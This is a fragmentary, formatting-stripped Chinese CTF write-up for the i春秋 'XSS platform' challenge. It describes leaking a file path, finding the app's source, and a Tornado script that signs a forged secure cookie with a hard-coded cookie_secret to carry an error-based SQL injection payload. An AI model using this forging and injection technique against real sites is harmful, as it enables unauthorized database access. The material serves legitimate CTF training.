i春秋xss平台
dalao wp pass pass[]= 爆出一条文件路径 直接访问试试 什么鬼。。。。看来没什么东西 rtiny github xss py lock.py sql username self .get_secure_cookieself.get_secure_cookie函数的 index.py cookie cookie_secret # coding:utf-8 import tornado . ioloop import tornado . web # @author: V0W # @reference: https://blog.csdn.net/include_heqile/article/details/82591707 settings = { "cookie_secret" : "M0ehO260Qm2dD/MQFYfczYpUbJoyrkp6qYoI2hRw2jc=" , } class MainHandler ( tornado . web . RequestHandler ): def get ( self ): self . write ( "Hello" ) #self.set_secure_cookie("username","' and extractvalue(1,concat(0x5c,(select version()))) -- ")